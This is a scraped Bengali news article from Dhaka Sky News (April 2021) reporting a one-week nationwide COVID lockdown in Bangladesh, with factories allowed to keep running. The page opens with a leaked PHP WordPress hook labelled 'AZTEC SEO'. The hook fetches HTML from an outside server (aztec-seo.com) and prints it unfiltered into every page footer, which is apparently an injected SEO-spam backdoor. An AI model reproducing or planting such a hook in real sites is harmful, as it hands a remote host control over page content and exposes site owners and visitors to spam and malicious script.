/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); লকডাউনে শিল্প-কলকারখানা চালু থাকবে | Dhaka Sky News

সারাদেশ আবার এক সপ্তাহের জন্য লকডাউন ঘোষণা

আগের সংবাদ

অভিবাসীবাহী নৌকা পাঠিয়ে তুরস্ক উসকানি দেয়ার চেষ্টা করছে: গ্রিস

পরের সংবাদ

লকডাউনে শিল্প-কলকারখানা চালু থাকবে

ঢাকা স্কাইনিউজ রিপোর্ট

প্রকাশিত: April 3, 2021 , 2:54 pm

দেশে বৈশ্বিক মহামারি করোনাভাইরাসের প্রাদুর্ভাব বেড়ে যাওয়ায় আগামী সোমবার থেকে সারাদেশ এক সপ্তাহের জন্য লকডাউন ঘোষণা করেছে সরকার। তবে লকডাউনের মধ্যে স্বাস্থ্যবিধি মেনে চলার শর্তে শিল্পকারখানা চালু থাকবে বলে জানিয়েছেন জনপ্রশাসন প্রতিমন্ত্রী ফরহাদ হোসেন। আজ শনিবার নিজ বাসভবন থেকে এক ভিডিও বার্তায় এ তথ্য জানান প্রতিমন্ত্রী।

প্রতিমন্ত্রী বলেন, ‘দ্রুত বেড়ে যাওয়া করোনা সংক্রমণ রোধ করার স্বার্থে সরকার দুই তিন দিনের মধ্যে সারাদেশে এক সপ্তাহের জন্য লকডাউনের সিদ্ধান্ত দিতে যাচ্ছে। সেক্ষেত্রে লকডাউন চলাকালে জরুরি সেবাদানকারী প্রতিষ্ঠানগুলো খোলা থাকবে। আর শিল্প কলকারখানা খোলা থাকবে। শ্রমিকরা স্বাস্থ্যবিধি মেনে এবং বিভিন্ন শিফটিংয়ের মাধ্যমে যেন তারা কলকারখানায় কাজ করতে পারে।’

আজ সকালে আওয়ামী লীগের সাধারণ সম্পাদক ও সেতুমন্ত্রী ওবায়দুল কাদের নিজ বাসভবনে এক ভার্চুয়াল ব্রিফিংয়ে লকডাউন বিষয়ক সরকারের সিদ্ধান্তের কথা জানান।